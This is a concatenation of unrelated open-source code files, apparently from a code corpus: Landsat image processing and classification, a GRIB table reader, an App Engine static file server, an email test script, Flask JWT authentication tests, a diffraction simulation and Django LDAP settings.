layer = dataSource.GetLayer()
print str('Using {} as ROI'.format(self.roi))
except AttributeError:
e = str('Could not open {}'.format(self.roi))
raise Exception
#loop through all scenes
out_files = []
for scene in scenes:
#find all bands for scene exclude quality band BQA and B8
try:
bands = [b for b in ut.findFiles(self.ls_path,scene+'*_B'+pattern) if '_BQA' not in b]
bands = [b for b in bands if '_B8' not in b]
#in case of multiple scenes (and not first scene is processed) check if nr of bands are equal
try:
#only if more than one scene and at least second scene
nr_bands
except:
if len(bands)==0:
e = str('Found no bands for scene {}.'.format(scene))
raise Exception
else:
#store number of bands for potential additonal scenes
nr_bands = len(bands)
print str('Found {} bands (if present, excluding B8 and BQA) for scene {} '.format(nr_bands,scene))
else:
if len(bands)!=nr_bands:
e = str('Found {} instead of {} bands (excluding B8 and BQA) for scene {}. If multiple scenes are provided in the input directory, ensure they have equal bands!'.format(len(bands),nr_bands,scene))
else:
print str('Found {} bands (if present, excluding B8 and BQA) for scene {} '.format(len(bands),scene))
except:
raise Exception
#Check if ROI and scene overlap
try:
error,overlap = ut.vector_raster_overlap(self.roi,self.ls_path+bands[0])
except:
e = str('Unspecified error while trying to execute utils.vector_raster_overlap function with {} and {}'.format(self.roi,bands[0]))
raise Exception
if error!='SUCCESS':
e = error
raise Exception
else:
try:
1/overlap
except ZeroDivisionError:
e = str('The provided ROI {} does not overlap with scene {}'.format(self.roi,scene))
raise Exception
#use gdalwarp to cut bands to roi
try:
#go through bands
for band in bands:
cmd = ['gdalwarp','-overwrite','-q','-cutline',self.roi,'-crop_to_cutline',self.ls_path+band,self.ls_path+band[:-4]+'_satexTMP_ROI'+pattern[1:]]
subprocess.check_call(cmd,startupinfo=self.startupinfo)
print str('Cropped band {} to ROI'.format(band))
except:
e = str('Could not execute gdalwarp cmd: {}.\nError is:{}'.format(' '.join(cmd),error))
raise Exception
# Layerstack
try:
#respect order B1,B2,B3,B4,B5,B6,B7,B9,B10,B11
in_files = [str(self.ls_path+b[:-4]+'_satexTMP_ROI'+pattern[1:]) for b in bands]
in_files.sort()
if nr_bands==10:
# For Landsat 8 B10,B11 considered smaller --> resort
in_files = in_files[2:] + in_files[0:2]
out_file = str(os.path.dirname(self.out_fname)+'/'+scene+'_satex_mul'+pattern[1:])
#call otb wrapper
error = ut.otb_concatenate(in_files,out_file)
if error!='success': raise ZeroDivisionError
#append file to list
out_files.append(out_file)
#qgis.core.QgsMessageLog.logMessage(str('Concatenated bands for scene {}'.format(scene)))
print str('Concatenated bands for scene {}'.format(scene))
except ZeroDivisionError:
e = str('Could not execute OTB ConcatenateImages for scene: {}\nin_files: {}\nout_file: {}. \nError is: {}'.format(scene,in_files,out_file,error))
raise Exception
# after all scenes were processed combine them to a virtual raster tile
try:
cmd = ["gdalbuildvrt","-q","-srcnodata","0","-overwrite",self.out_fname]
for f in out_files:
cmd.append(f)
subprocess.check_call(cmd,startupinfo=self.startupinfo)
print str('Merged {} different scenes to {}'.format(len(out_files),self.out_fname))
except subprocess.CalledProcessError:
e = str('Could not execute gdalbuildvrt cmd: {}'.format(' '.join(cmd)))
raise Exception
##add to map canvas if checked
#if self.Pdlg.checkBox.isChecked():
# try:
# self.iface.addRasterLayer(str(self.out_fname), "SatEx_vrt")
# except:
# e = str('Could not add {} to the layer canvas'.format(self.out_fname))
# raise Exception
except:
#self.errorMsg(e)
#qgis.core.QgsMessageLog.logMessage(str('Exception: {}'.format(e)))
print str('Exception: {}'.format(e))
#qgis.core.QgsMessageLog.logMessage(str('Exception occurred...deleting temporary files'))
print str('Exception occurred...deleting temporary files')
ut.delete_tmps(self.ls_path)
else:
#qgis.core.QgsMessageLog.logMessage(str('Processing successfully completed'))
#qgis.core.QgsMessageLog.logMessage(str('Deleting temporary files'))
print str('Processing successfully completed')
print str('Deleting temporary files')
#self.iface.messageBar().pushMessage('Processing successfully completed, see log for details',self.iface.messageBar().SUCCESS,duration=3)
print 'Processing successfully completed, see log for details'
ut.delete_tmps(self.ls_path)
def run_classification(self):
"""Run method that performs all the real work"""
import utils
import traceback
#import qgis.core
import ogr
import os
import subprocess
#Get user edits
valid_input=self.updateCForm()
#TODO:fix
self.classification_type='libsvm'
self.svmModel = self.in_train[:-4]+'_svmModel.svm'
self.ConfMatrix = self.in_train[:-4]+'_CM.csv'
try:
import otbApplication
except:
print 'ERROR: Plugin requires installation of OrfeoToolbox'
e = 'Unspecified error'
try:
#instantiate utilities functions
ut = utils.utils()
#FIX:overwrite utils function train
print "FIX:overwriting utils function otb_train_cls due to bug in otb"
#def new_train_classifier(raster, train, stats, classification_type, label, svmModel, ConfMatrix):
# cmd = "~/OTB-5.10.1-Linux64/bin/otbcli_TrainImagesClassifier -io.il {} -io.vd {} -io.imstat {} -sample.mv 100 -sample.vfn {} -classifier {} -classifier.libsvm.k linear -classifier.libsvm.c 1 -classifier.libsvm.opt false -io.out {} -io.confmatout {}".format(raster,train,stats,label,classification_type,svmModel,ConfMatrix)
# os.system(cmd)
# return "success"
#ut.otb_train_classifier=new_train_classifier
try:
#check if input is not empty string
1/valid_input
except ZeroDivisionError:
e = str('Please fill all required input fields')
raise Exception
#check if training fields overlap with raster
if not self.external:
try:
error,overlap = ut.vector_raster_overlap(self.in_train,self.raster)
except:
e = str('Unspecified error while trying to execute utils.vector_raster_overlap function')
raise Exception
if error!='SUCCESS':
e = error
raise Exception
else:
try:
1/overlap
except ZeroDivisionError:
e = str('At least one feature in {} does not overlap with {}'.format(self.in_train,self.raster))
raise Exception
#generate image statistics
try:
self.stats = str(self.raster[:-4]+'_stats.xml')
error=ut.otb_image_statistics(str(self.raster),str(self.stats))
if error!='success':raise ZeroDivisionError
#qgis.core.QgsMessageLog.logMessage(str('Calculated image statistics {} for {}'.format(self.stats,self.raster)))
print str('Calculated image statistics {} for {}'.format(self.stats,self.raster))
except ZeroDivisionError:
e = str('Could not execute OTB Image Statistics on: {}. \nError is:{}'.format(self.raster,error))
raise Exception
#differntiate two cases case 1) external SVM provided an case 2) on the fly SVM training
if self.external:
if self.in_train!='':
#use full training set for testing
self.test = self.in_train
#get SVM filename
self.svmModel = self.Cdlg.lineEdit_4.text()
else:
#split training dataset in 80% train 20% testing
[self.error,self.test,self.train] = ut.split_train(self.in_train,self.label,self.startupinfo)
if self.error != 'success':
e=self.error
raise Exception
else:
#qgis.core.QgsMessageLog.logMessage(str('Split ground truth data set into {} (~80%) and {} (~20%)'.format(self.train,self.test)))
print str('Split ground truth data set into {} (~80%) and {} (~20%)'.format(self.train,self.test))
#train classifier
#on the fly (wrong) confusion matrix gets overwritten later
try:
error=ut.otb_train_classifier(self.raster, self.train, self.stats, self.classification_type, self.label, self.svmModel, self.ConfMatrix)
if error!='success': raise ZeroDivisionError
#qgis.core.QgsMessageLog.logMessage(str('Trained image classifier using {} and {}'.format(self.raster,self.train)))
print str('Trained image classifier using {} and {}'.format(self.raster,self.train))
except ZeroDivisionError:
e = 'Could not execute OTB TrainClassifiers with {} {} {} {} {} {} {}. \nError is:{}'.format(self.raster, self.train, self.stats, self.classification_type, self.label, self.svmModel, self.ConfMatrix,error)
raise Exception
#classify image
try:
error=ut.otb_classification(self.raster, self.stats, self.svmModel, self.out_fname)
if error!='success': raise ZeroDivisionError
print str('Image {} classified as {}'.format(self.raster,self.out_fname))
except ZeroDivisionError:
e = 'Could not execute OTB Classifier with {}, {}, {}, {}. \n Error is: {}'.format(self.raster, self.stats, self.svmModel, self.out_fname,error)
raise Exception
#confusion matrix
try:
#testing is optional in case of externally provided SVM
if self.in_train!='':
print self.out_fname,self.ConfMatrix,self.test,self.label
error=ut.otb_confusion_matrix(self.out_fname,self.ConfMatrix,self.test,self.label)
if error!='success':raise ZeroDivisionError
print str('Confusion matrix calculated on classified image {} with test set {} saved as {}'.format(self.out_fname,self.test,self.ConfMatrix))
except ZeroDivisionError:
e = 'Could not execute OTB Confusion Matrix with {}, {}, {}, {}. \nError is: {}'.format(self.out_fname, self.ConfMatrix, self.test, self.label)
raise Exception
#if sieving is asked perform sieving
#if self.Cdlg.checkBox_3.isChecked():
if (self.config['sieve']!=''):
try:
if os.name=='nt':
cmd = ['gdal_sieve.bat','-q','-st',str(self.sieve),'-8',str(self.out_fname)]
else:
cmd = ['gdal_sieve.py','-q','-st',str(self.sieve),'-8',str(self.out_fname)]
subprocess.check_call(cmd,startupinfo=self.startupinfo)
except subprocess.CalledProcessError:
e = 'Could not execute {}'.format(cmd)
raise Exception
#add to map canvas if checked
#if self.Cdlg.checkBox_2.isChecked():
# try:
# self.iface.addRasterLayer(str(self.out_fname), "SatEx_classified_scene")
# except:
# e = str('Could not add {} to the layer canvas'.format(self.out_fname))
# raise Exception
except:
#self.errorMsg(e)
#qgis.core.QgsMessageLog.logMessage(e)
print e
else:
print str('Processing completed')
print 'Processing successfully completed, see log for details'
def main():
import ConfigParser
#read config
Config = ConfigParser.ConfigParser()
Config.read("config.ini")
#store as dictionary
config = {}
#preprocessing
parameters = ['ls_path','roi','out_fname']
for par in parameters:
try:
config[par] = Config.get("preprocessing",par)
except:
config[par] = ''
#save before overriden
config['out_fname1']= config['out_fname']
#classification
parameters = ['raster','in_train','out_fname','label','sieve','external']
for par in parameters:
try:
config[par] = Config.get("classification",par)
except:
config[par] = ''
#satex instance
satex = SatEx(config)
#workflow
if (config['ls_path']!=''):
satex.run_preprocessing()
else:
print 'No valid preprocessing configuration found. Skipping..'
if (config['raster']!=''):
satex.run_classification()
else:
print 'No valid classification configuration found. Skipping..'
if __name__ == "__main__":
main()
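# Illustrative config.ini layout consumed by main() above. The section and key
# names come from the code; the values below are made-up examples.
#
# [preprocessing]
# ls_path = /data/landsat8/scenes
# roi = /data/roi/area_of_interest.shp
# out_fname = /data/output/mosaic.vrt
#
# [classification]
# raster = /data/output/mosaic.vrt
# in_train = /data/training/ground_truth.shp
# out_fname = /data/output/classified.tif
# label = class
# sieve = 10
# external =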
| bsd-3-clause | -9,089,529,124,461,430,000 | 41.912833 | 332 | 0.574903 | false |
ARPA-SIMC/arkimet | python/arkimet/formatter/eccodes.py | 1 | 3601 | import os
import re
def get_eccodes_def_dir() -> str:
"""
get the list of directories where grib_api/eccodes keep their definitions
(parsed from the colon-separated *_DEFINITION_PATH environment variables)
"""
path = os.environ.get("ECCODES_DEFINITION_PATH", None)
if path is not None:
return path.split(":")
path = os.environ.get("GRIBAPI_DEFINITION_PATH", None)
if path is not None:
return path.split(":")
return ["/usr/share/eccodes/definitions/"]
class GribTable:
"""
Read a grib table.
edition is the GRIB edition: 1 or 2
table is the table name, for example "0.0"
Builds a table where each index maps to a pair (abbreviation, description);
indices that do not appear in the file are simply absent.
For convenience, the object also has two methods, 'abbr' and 'desc', that
return the abbreviation or the description, falling back on returning the
index (as a string) if it is not available.
For example:
origins = GribTable(1, "0")
print(origins.abbr(98)) # Prints 'ecmf'
print(origins.desc(98)) # Prints 'European Center for Medium-Range Weather Forecasts'
print(origins.abbr(999)) # Prints '999'
print(origins.desc(999)) # Prints '999'
"""
cache = {}
re_table_line = re.compile(r"^\s*(?P<idx>\d+)\s+(?P<abbr>\S+)\s+(?P<desc>.+)$")
def __init__(self, edition: int, table: str):
self.edition = edition
self.table = table
self._abbr = {}
self._desc = {}
for path in get_eccodes_def_dir():
# Build the file name
fname = os.path.join(path, "grib" + str(edition), str(table)) + ".table"
try:
with open(fname, "rt") as fd:
for line in fd:
mo = self.re_table_line.match(line)
if not mo:
continue
idx = int(mo.group("idx"))
self._abbr[idx] = mo.group("abbr")
self._desc[idx] = mo.group("desc").strip()
except FileNotFoundError:
pass
def set(self, code: int, abbr: str, desc: str):
"""
Add/replace a value in the table
"""
self._abbr[code] = abbr
self._desc[code] = desc
def has(self, val: int) -> bool:
return val in self._abbr
def abbr(self, val: int) -> str:
"""
Get an abbreviated description
"""
res = self._abbr.get(val)
if res is None:
return str(val)
else:
return res
def desc(self, val: int) -> str:
"""
Get a long description
"""
res = self._desc.get(val)
if res is None:
return str(val)
else:
return res
@classmethod
def load(cls, edition: int, table: str) -> "GribTable":
key = (edition, table)
res = cls.cache.get(key)
if res is None:
res = cls(edition, table)
cls.cache[key] = res
return res
@classmethod
def get_grib2_table_prefix(cls, centre, table_version, local_table_version):
default_table_version = 4
if table_version is None or table_version == 255:
table_version = default_table_version
if local_table_version is not None and local_table_version not in (0, 255):
centres = cls.load(1, "0")
if centres.has(centre):
return os.path.join('tables', 'local', centres.abbr(centre), str(local_table_version))
return os.path.join('tables', str(table_version))
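# Minimal usage sketch (illustrative; assumes eccodes/grib_api definition files
# are installed so that GRIB1 table "0" can actually be found, otherwise the
# lookups simply fall back to the stringified code):
if __name__ == "__main__":
    centres = GribTable.load(1, "0")   # cached; repeated loads reuse the instance
    print(centres.abbr(98), "-", centres.desc(98))
    print(GribTable.get_grib2_table_prefix(98, 4, None))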
| gpl-2.0 | -5,546,674,192,884,967,000 | 29.008333 | 102 | 0.546515 | false |
html5rocks/updates.html5rocks.com | static.py | 1 | 5965 | import datetime
import hashlib
from google.appengine.api import memcache
from google.appengine.api import taskqueue
from google.appengine.ext import db
from google.appengine.ext import deferred
from google.appengine.datastore import entity_pb
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
import fix_path
import aetycoon
import config
import utils
HTTP_DATE_FMT = "%a, %d %b %Y %H:%M:%S GMT"
if config.google_site_verification is not None:
ROOT_ONLY_FILES = ['/robots.txt','/' + config.google_site_verification]
else:
ROOT_ONLY_FILES = ['/robots.txt']
class StaticContent(db.Model):
"""Container for statically served content.
The serving path for content is provided in the key name.
"""
body = db.BlobProperty()
content_type = db.StringProperty()
status = db.IntegerProperty(required=True, default=200)
last_modified = db.DateTimeProperty(required=True)
etag = aetycoon.DerivedProperty(lambda x: hashlib.sha1(x.body).hexdigest())
indexed = db.BooleanProperty(required=True, default=True)
headers = db.StringListProperty()
def get(path):
"""Returns the StaticContent object for the provided path.
Args:
path: The path to retrieve StaticContent for.
Returns:
A StaticContent object, or None if no content exists for this path.
"""
entity = memcache.get(path)
if entity:
entity = db.model_from_protobuf(entity_pb.EntityProto(entity))
else:
entity = StaticContent.get_by_key_name(path)
if entity:
memcache.set(path, db.model_to_protobuf(entity).Encode())
return entity
def set(path, body, content_type, indexed=True, **kwargs):
"""Sets the StaticContent for the provided path.
Args:
path: The path to store the content against.
body: The data to serve for that path.
content_type: The MIME type to serve the content as.
indexed: Index this page in the sitemap?
**kwargs: Additional arguments to be passed to the StaticContent constructor
Returns:
A StaticContent object.
"""
now = datetime.datetime.now().replace(second=0, microsecond=0)
defaults = {
"last_modified": now,
}
defaults.update(kwargs)
content = StaticContent(
key_name=path,
body=body,
content_type=content_type,
indexed=indexed,
**defaults)
content.put()
memcache.replace(path, db.model_to_protobuf(content).Encode())
try:
eta = now.replace(second=0, microsecond=0) + datetime.timedelta(seconds=65)
if indexed:
deferred.defer(
utils._regenerate_sitemap,
_name='sitemap-%s' % (now.strftime('%Y%m%d%H%M'),),
_eta=eta)
except (taskqueue.taskqueue.TaskAlreadyExistsError, taskqueue.taskqueue.TombstonedTaskError), e:
pass
return content
def add(path, body, content_type, indexed=True, **kwargs):
"""Adds a new StaticContent and returns it.
Args:
As per set().
Returns:
A StaticContent object, or None if one already exists at the given path.
"""
def _tx():
if StaticContent.get_by_key_name(path):
return None
return set(path, body, content_type, indexed, **kwargs)
return db.run_in_transaction(_tx)
def remove(path):
"""Deletes a StaticContent.
Args:
path: Path of the static content to be removed.
"""
memcache.delete(path)
def _tx():
content = StaticContent.get_by_key_name(path)
if not content:
return
content.delete()
return db.run_in_transaction(_tx)
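# Usage sketch (illustrative only; set/get/add/remove need a working App Engine
# datastore and memcache, so this is not meant to run outside that environment):
#
#   content = set('/about/', '<h1>About</h1>', 'text/html')
#   cached = get('/about/')            # served from memcache when possible
#   remove('/about/')                  # drops both the datastore entity and the cache entry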
class StaticContentHandler(webapp.RequestHandler):
def output_content(self, content, serve=True):
if content.content_type:
self.response.headers['Content-Type'] = content.content_type
last_modified = content.last_modified.strftime(HTTP_DATE_FMT)
# Add CORS and Chrome Frame support to entire site.
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'
self.response.headers['Last-Modified'] = last_modified
self.response.headers['ETag'] = '"%s"' % (content.etag,)
for header in content.headers:
key, value = header.split(':', 1)
self.response.headers[key] = value.strip()
if serve:
self.response.set_status(content.status)
self.response.out.write(content.body)
else:
self.response.set_status(304)
def get(self, path):
if not path.startswith(config.url_prefix):
if path not in ROOT_ONLY_FILES:
self.error(404)
self.response.out.write(utils.render_template('404.html'))
return
else:
if config.url_prefix != '':
path = path[len(config.url_prefix):]# Strip off prefix
if path in ROOT_ONLY_FILES:# This lives at root
self.error(404)
self.response.out.write(utils.render_template('404.html'))
return
content = get(path)
if not content:
self.error(404)
self.response.out.write(utils.render_template('404.html'))
return
serve = True
if 'If-Modified-Since' in self.request.headers:
try:
last_seen = datetime.datetime.strptime(
self.request.headers['If-Modified-Since'].split(';')[0],# IE8 '; length=XXXX' as extra arg bug
HTTP_DATE_FMT)
if last_seen >= content.last_modified.replace(microsecond=0):
serve = False
except ValueError, e:
import logging
logging.error('StaticContentHandler in static.py, ValueError:' + self.request.headers['If-Modified-Since'])
if 'If-None-Match' in self.request.headers:
etags = [x.strip('" ')
for x in self.request.headers['If-None-Match'].split(',')]
if content.etag in etags:
serve = False
self.output_content(content, serve)
application = webapp.WSGIApplication([
('(/.*)', StaticContentHandler),
])
def main():
fix_path.fix_sys_path()
run_wsgi_app(application)
if __name__ == '__main__':
main()
| apache-2.0 | 6,382,424,280,634,468,000 | 30.230366 | 115 | 0.674602 | false |
rboman/progs | apps/mails/mimetest.py | 1 | 1080 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2017 Romain Boman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import smtplib
from email.mime.text import MIMEText
file = open("CYGWIN-diffs.html",'r')
text = file.read()
file.close()
toA = "[email protected]"
fromA = "[email protected]"
mail = MIMEText(text)
mail['From'] = fromA
mail['Subject'] = "Sujet du message"
mail['To'] = toA
mail['Content-Type'] = "text/html"
smtp = smtplib.SMTP("smtp.ulg.ac.be")
smtp.set_debuglevel(1)
smtp.sendmail(fromA, [toA], mail.as_string())
smtp.close()
| apache-2.0 | -2,451,455,311,142,843,400 | 28.216216 | 76 | 0.703704 | false |
atlassian/asap-authentication-python | atlassian_jwt_auth/frameworks/flask/tests/test_flask.py | 1 | 5032 | import unittest
from flask import Flask
from atlassian_jwt_auth.contrib.flask_app import requires_asap
from atlassian_jwt_auth.contrib.tests.utils import get_static_retriever_class
from atlassian_jwt_auth.frameworks.flask import with_asap
from atlassian_jwt_auth.tests import utils
from atlassian_jwt_auth.tests.utils import (
create_token,
)
def get_app():
app = Flask(__name__)
app.config.update({
'ASAP_VALID_AUDIENCE': 'server-app',
'ASAP_VALID_ISSUERS': ('client-app',),
'ASAP_PUBLICKEY_REPOSITORY': None
})
@app.route("/")
@requires_asap
def view():
return "OK"
@app.route("/restricted-to-another-client/")
@with_asap(issuers=['another-client'])
def view_for_another_client_app():
return "OK"
return app
class FlaskTests(utils.RS256KeyTestMixin, unittest.TestCase):
""" tests for the atlassian_jwt_auth.contrib.tests.flask """
def setUp(self):
self._private_key_pem = self.get_new_private_key_in_pem_format()
self._public_key_pem = utils.get_public_key_pem_for_private_key_pem(
self._private_key_pem
)
self.app = get_app()
self.client = self.app.test_client()
retriever = get_static_retriever_class({
'client-app/key01': self._public_key_pem
})
self.app.config['ASAP_KEY_RETRIEVER_CLASS'] = retriever
def send_request(self, token, url='/'):
""" returns the response of sending a request containing the given
token sent in the Authorization header.
"""
return self.client.get(url, headers={
'Authorization': b'Bearer ' + token
})
def test_request_with_valid_token_is_allowed(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
def test_request_with_duplicate_jti_is_rejected_as_per_setting(self):
self.app.config['ASAP_CHECK_JTI_UNIQUENESS'] = True
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
self.assertEqual(self.send_request(token).status_code, 401)
def _assert_request_with_duplicate_jti_is_accepted(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
self.assertEqual(self.send_request(token).status_code, 200)
def test_request_with_duplicate_jti_is_accepted(self):
self._assert_request_with_duplicate_jti_is_accepted()
def test_request_with_duplicate_jti_is_accepted_as_per_setting(self):
self.app.config['ASAP_CHECK_JTI_UNIQUENESS'] = False
self._assert_request_with_duplicate_jti_is_accepted()
def test_request_with_invalid_audience_is_rejected(self):
token = create_token(
'client-app', 'invalid-audience',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 401)
def test_request_with_invalid_token_is_rejected(self):
response = self.send_request(b'notavalidtoken')
self.assertEqual(response.status_code, 401)
def test_request_with_invalid_issuer_is_rejected(self):
# Try with a different issuer with a valid signature
self.app.config['ASAP_KEY_RETRIEVER_CLASS'] = (
get_static_retriever_class({
'another-client/key01': self._public_key_pem
})
)
token = create_token(
'another-client', 'server-app',
'another-client/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 403)
def test_decorated_request_with_invalid_issuer_is_rejected(self):
# Try with an issuer that is not allowed for this route
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
url = '/restricted-to-another-client/'
self.assertEqual(self.send_request(token, url=url).status_code, 403)
def test_request_subject_and_issue_not_matching(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem,
subject='different'
)
self.assertEqual(self.send_request(token).status_code, 401)
def test_request_subject_does_not_need_to_match_issuer_from_settings(self):
self.app.config['ASAP_SUBJECT_SHOULD_MATCH_ISSUER'] = False
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem,
subject='different'
)
self.assertEqual(self.send_request(token).status_code, 200)
| mit | -3,690,334,047,130,404,000 | 35.201439 | 79 | 0.627385 | false |
haomiao/monster | setup.py | 1 | 2264 | '''
monster
-----
monster is a general-purpose Python template framework for new projects;
you can use it to bootstrap your own projects quickly. And before you ask: it's MIT licensed!
Some tips:
1. install the setuptools tool
2. run pip against requirements.txt to install the required modules
3. others
'''
import codecs
from setuptools import setup,find_packages
from setuptools.command.test import test as TestCommand
import os
import sys
import re
import ast
HERE = os.path.abspath(os.path.dirname(__file__))
_version_re = re.compile(r'__version__\s+=\s+(.*)')
class RunTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['--strict', '--verbose', '--tb=long', 'tests']
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
def read(*parts):
return codecs.open(os.path.join(HERE, *parts), 'r').read()
monster_version = str(ast.literal_eval(_version_re.search(read("monster/__init__.py")).group(1)))
'''str(read('README.md'))'''
long_description = 'faf'
setup(
name='monster',
version=monster_version,
url='https://github.com/haomiao/monster',
author='colper',
author_email='[email protected]',
description='a general Python template framework for new projects',
long_description=long_description,
license='MIT',
packages=['monster'],
include_package_data=True,
#package_data={}
zip_safe=False,
platforms='any',
cmdclass={'test': RunTest},
tests_require=['pytest','nose'],
#install_requires=['pytest'],
#entry_points={}
extras_require={
'testing': ['pytest'],
},
classifiers = [
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Natural Language :: English',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| mit | 8,327,896,381,979,947,000 | 27.3 | 97 | 0.636484 | false |
srio/Diffraction | fresnel_kirchhoff_1D.py | 1 | 2886 | """
fresnel:
functions:
goFromTo: calculates the phase shift matrix
"""
__author__ = "Manuel Sanchez del Rio"
__contact__ = "[email protected]"
__copyright = "ESRF, 2012"
import numpy, math
def goFromTo(source,image,distance=1.0,lensF=None,wavelength=1e-10):
distance = numpy.array(distance)
x1 = numpy.outer(source,numpy.ones(image.size))
x2 = numpy.outer(numpy.ones(source.size),image)
r = numpy.sqrt( numpy.power(x1-x2,2) + numpy.power(distance,2) )
# add lens at the image plane
if lensF is not None:
r = r - numpy.power(x1-x2,2)/lensF
wavenumber = numpy.pi*2/wavelength
return numpy.exp(1.j * wavenumber * r)
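# What goFromTo returns (sketch of the underlying formula): for every pair of
# points (x1, x2) on the source and image planes it evaluates the path length
#     r = sqrt((x1 - x2)**2 + distance**2)
# optionally reduced by the lens term (x1 - x2)**2 / lensF, and gives back the
# matrix of phase factors exp(i * 2*pi/wavelength * r). Summing that matrix over
# the source points (as the __main__ block below does via numpy.dot) approximates
# the 1D Fresnel-Kirchhoff diffraction integral up to a constant amplitude factor.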
if __name__ == '__main__':
# wavelength = 1e-10
# aperture_diameter = 10e-6
# detector_size = 0.8e-3
# #wavelength = 500e-9
# #aperture_diameter = 1e-3
# #detector_size = 4e-3
#
# sourcepoints = 1000
# detpoints = 1000
# distance = 1.00
# lensF = None
# wavelength = 5000e-10
# sourcesize = 500e-6
# detector_size = 0.008
#wavelength = 500e-9
#aperture_diameter = 1e-3
#detector_size = 4e-3
wavelength = 1.24e-10 # 10keV
aperture_diameter = 40e-6 # 1e-3 # 1e-6
detector_size = 800e-6
distance = 3.6
sourcepoints = 1000
detpoints = 1000
lensF = None
sourcesize = aperture_diameter
position1x = numpy.linspace(-sourcesize/2,sourcesize/2,sourcepoints)
position2x = numpy.linspace(-detector_size/2,detector_size/2,detpoints)
fields12 = goFromTo(position1x,position2x,distance, \
lensF=lensF,wavelength=wavelength)
print ("Shape of fields12: ",fields12.shape)
#prepare results
fieldComplexAmplitude = numpy.dot(numpy.ones(sourcepoints),fields12)
print ("Shape of Complex U: ",fieldComplexAmplitude.shape)
print ("Shape of position1x: ",position1x.shape)
fieldIntensity = numpy.power(numpy.abs(fieldComplexAmplitude),2)
fieldPhase = numpy.arctan2(numpy.real(fieldComplexAmplitude), \
numpy.imag(fieldComplexAmplitude))
#
# write spec formatted file
#
out_file = "fresnel_kirchhoff_1D.spec"
f = open(out_file, 'w')
header="#F %s \n\n#S 1 fresnel-kirchhoff diffraction integral\n#N 3 \n#L X[m] intensity phase\n"%out_file
f.write(header)
for i in range(detpoints):
out = numpy.array((position2x[i], fieldIntensity[i], fieldPhase[i]))
f.write( ("%20.11e "*out.size+"\n") % tuple( out.tolist()) )
f.close()
print ("File written to disk: %s"%out_file)
#
#plots
#
from matplotlib import pylab as plt
plt.figure(1)
plt.plot(position2x*1e6,fieldIntensity)
plt.title("Fresnel-Kirchhoff Diffraction")
plt.xlabel("X [um]")
plt.ylabel("Intensity [a.u.]")
plt.show() | gpl-2.0 | -2,424,140,715,528,884,700 | 27.029126 | 112 | 0.618157 | false |
jlaine/django-ldapdb | examples/settings.py | 1 | 3440 | # -*- coding: utf-8 -*-
# This software is distributed under the two-clause BSD license.
# Copyright (c) The django-ldapdb project
from __future__ import unicode_literals
import ldap
DEBUG = True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'ldapdb.db',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
},
'ldap': {
'ENGINE': 'ldapdb.backends.ldap',
'NAME': 'ldap://localhost',
'USER': 'cn=admin,dc=nodomain',
'PASSWORD': 'test',
# 'TLS': True,
'CONNECTION_OPTIONS': {
ldap.OPT_X_TLS_DEMAND: True,
}
}
}
DATABASE_ROUTERS = ['ldapdb.router.Router']
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'some_random_secret_key'
MIDDLEWARE = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
]
ROOT_URLCONF = 'examples.urls'
STATIC_URL = '/static/'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
